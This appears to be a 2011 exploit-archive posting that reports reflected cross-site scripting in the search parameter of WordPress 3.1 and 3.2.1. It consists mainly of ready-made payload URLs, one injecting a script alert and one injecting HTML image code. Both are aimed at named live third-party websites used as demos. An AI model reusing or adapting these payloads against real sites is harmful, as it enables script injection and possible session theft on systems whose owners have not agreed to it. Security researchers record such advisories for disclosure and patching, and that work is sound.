Home / exploitsPDF  

WordPress 3.1 / 3.2.1 Cross Site Scripting

Posted on 26 August 2011

# Exploit Title: Cross Site Scripting WordPress 3.1,3.2.1 # Date: 26.08.2011 # Author: Sony # Software Link: http://wordpress.org/ # Version: 3.1,3.2.1 # My blog: http://st2tea.blogspot.com/ ....................................................................... XSS in the Search Demo 3.2.1: http://www.futurefisherman.org/ <meta name="generator" content="WordPress 3.2.1" /> http://www.futurefisherman.org/?s=%3CIMG%20%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C/SCRIPT%3E%22%3E Demo 3.1: (Html Code Injection) http://blogs.comodo.com/ http://blogs.comodo.com/?s=%3Cimg%20src=http://wallpapers.pcwatch.com/Uploads/201011/36587531-6126-457a-86c0-1d177add2093.jpg%20align=center%3E

 

TOP